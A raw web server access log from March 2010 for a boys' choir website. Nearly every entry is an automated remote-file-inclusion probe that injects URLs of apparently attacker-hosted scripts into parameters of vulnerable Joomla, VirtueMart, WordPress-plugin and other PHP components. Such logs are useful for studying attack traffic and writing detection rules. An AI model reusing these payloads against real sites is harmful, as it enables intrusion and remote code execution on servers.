210.116.103.118 - - [09/Mar/2010:09:19:11 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.116.103.118 - - [09/Mar/2010:09:19:11 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.116.103.118 - - [09/Mar/2010:09:19:17 -0800] "GET /logs/access_100116.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
75.119.216.146 - - [09/Mar/2010:09:19:25 -0800] "GET /logs/access_100117.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
75.119.216.146 - - [09/Mar/2010:09:19:25 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
75.119.216.146 - - [09/Mar/2010:09:20:27 -0800] "GET /logs/access_091213.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
111.67.195.234 - - [09/Mar/2010:09:20:28 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
111.67.195.234 - - [09/Mar/2010:09:20:28 -0800] "GET /logs/access_100212.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
111.67.195.234 - - [09/Mar/2010:09:20:28 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:09:20:34 -0800] "GET /logs/access_100131.log%20%20/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.249.104.35 - - [09/Mar/2010:09:20:43 -0800] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.249.104.35 - - [09/Mar/2010:09:20:43 -0800] "GET /logs///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.249.104.35 - - [09/Mar/2010:09:20:43 -0800] "GET /logs/access_100117.log///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.249.104.35 - - [09/Mar/2010:09:20:58 -0800] "GET /logs/access_100209.log%20%20///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
111.67.195.234 - - [09/Mar/2010:09:21:11 -0800] "GET /logs/access_100213.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.249.104.35 - - [09/Mar/2010:09:21:14 -0800] "GET /logs/access_100209.log///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.249.104.35 - - [09/Mar/2010:09:21:16 -0800] "GET /logs/access_100209.log///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.237.78.176 - - [09/Mar/2010:09:21:26 -0800] "GET /logs/access_091229.log/?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.237.78.176 - - [09/Mar/2010:09:21:26 -0800] "GET /?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 200 1724 "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.237.78.176 - - [09/Mar/2010:09:21:26 -0800] "GET /logs/?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 200 1081 "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.249.104.35 - - [09/Mar/2010:09:22:02 -0800] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.249.104.35 - - [09/Mar/2010:09:22:02 -0800] "GET /logs///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.249.104.35 - - [09/Mar/2010:09:22:02 -0800] "GET /logs/access_100117.log///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:09:22:19 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:09:22:19 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:09:22:19 -0800] "GET /logs/access_100126.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.116.103.118 - - [09/Mar/2010:09:23:05 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.116.103.118 - - [09/Mar/2010:09:23:05 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.116.103.118 - - [09/Mar/2010:09:23:05 -0800] "GET /logs/access_100212.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.116.103.118 - - [09/Mar/2010:09:23:07 -0800] "GET /logs/access_100213.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:09:23:10 -0800] "GET /logs/access_091111.log%20%20/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:09:23:42 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:09:23:42 -0800] "GET /logs/access_100126.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:09:23:42 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:09:23:56 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:09:23:56 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:09:23:56 -0800] "GET /logs/access_100126.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.175.197.86 - - [09/Mar/2010:09:24:46 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.175.197.86 - - [09/Mar/2010:09:24:46 -0800] "GET /logs/access_100117.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.175.197.86 - - [09/Mar/2010:09:24:46 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.249.104.35 - - [09/Mar/2010:09:25:07 -0800] "GET /logs/access_100209.log///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.175.197.86 - - [09/Mar/2010:09:25:18 -0800] "GET /logs/access_091229.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.208.135.7 - - [09/Mar/2010:09:25:34 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig.absolute.path=http://www.vinotecnia.es/files/ts???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.americanboyschoir.com"
213.208.135.7 - - [09/Mar/2010:09:25:35 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig.absolute.path=http://www.vinotecnia.es/files/ts???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.americanboyschoir.com"
213.175.197.86 - - [09/Mar/2010:09:25:48 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.175.197.86 - - [09/Mar/2010:09:25:48 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.175.197.86 - - [09/Mar/2010:09:25:48 -0800] "GET /logs/access_091229.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.237.78.176 - - [09/Mar/2010:09:26:59 -0800] "GET /logs/access_091229.log%20%20/?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.237.78.176 - - [09/Mar/2010:09:26:59 -0800] "GET /?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 200 1724 "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.237.78.176 - - [09/Mar/2010:09:26:59 -0800] "GET /logs/?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 200 1081 "-" "Mozilla/5.0" "www.americanboyschoir.com"
165.132.30.11 - - [09/Mar/2010:09:27:24 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
165.132.30.11 - - [09/Mar/2010:09:27:24 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
165.132.30.11 - - [09/Mar/2010:09:27:25 -0800] "GET /logs/access_100126.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:27:53 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:27:53 -0800] "GET /logs/access_100212.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:27:53 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.12.122 - - [09/Mar/2010:09:28:14 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.12.122 - - [09/Mar/2010:09:28:14 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.12.122 - - [09/Mar/2010:09:28:15 -0800] "GET /logs/access_100126.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:28:21 -0800] "GET /logs/access_100213.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.109.127.201 - - [09/Mar/2010:09:29:08 -0800] "GET /logs/access_091111.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
222.109.127.201 - - [09/Mar/2010:09:29:08 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
222.109.127.201 - - [09/Mar/2010:09:29:09 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
222.109.127.201 - - [09/Mar/2010:09:29:09 -0800] "GET /logs/access_091111.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
75.119.216.146 - - [09/Mar/2010:09:29:09 -0800] "GET /logs/index2.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
75.119.216.146 - - [09/Mar/2010:09:29:09 -0800] "GET /logs/access_100212.log/index2.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
75.119.216.146 - - [09/Mar/2010:09:29:09 -0800] "GET /index2.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.109.127.201 - - [09/Mar/2010:09:29:10 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
222.109.127.201 - - [09/Mar/2010:09:29:10 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:09:29:19 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
75.119.216.146 - - [09/Mar/2010:09:29:20 -0800] "GET /logs/access_100116.log/index2.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:09:29:20 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.109.127.201 - - [09/Mar/2010:09:29:23 -0800] "GET /logs/access_100117.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
222.109.127.201 - - [09/Mar/2010:09:29:23 -0800] "GET /logs/access_100117.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:09:29:24 -0800] "GET /logs/access_100212.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:09:29:26 -0800] "GET /logs/access_100117.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:09:29:28 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:09:29:28 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:09:29:28 -0800] "GET /logs/access_100209.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:09:29:30 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:09:29:30 -0800] "GET /logs/access_100209.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:09:29:31 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:09:29:34 -0800] "GET /logs/access_100210.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:09:29:35 -0800] "GET /logs/access_100210.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.251.189.206 - - [09/Mar/2010:09:30:00 -0800] "GET /dministrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.251.189.206 - - [09/Mar/2010:09:30:00 -0800] "GET /logs//dministrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.251.189.206 - - [09/Mar/2010:09:30:00 -0800] "GET /logs/access_100131.log//dministrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
165.132.30.11 - - [09/Mar/2010:09:30:13 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
165.132.30.11 - - [09/Mar/2010:09:30:13 -0800] "GET /logs/access_100126.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
165.132.30.11 - - [09/Mar/2010:09:30:13 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
110.45.144.106 - - [09/Mar/2010:09:30:51 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.byz9991.jatimcrew.com/bot/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.americanboyschoir.com"
213.175.197.86 - - [09/Mar/2010:09:30:54 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.175.197.86 - - [09/Mar/2010:09:30:54 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.175.197.86 - - [09/Mar/2010:09:30:54 -0800] "GET /logs/access_091229.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
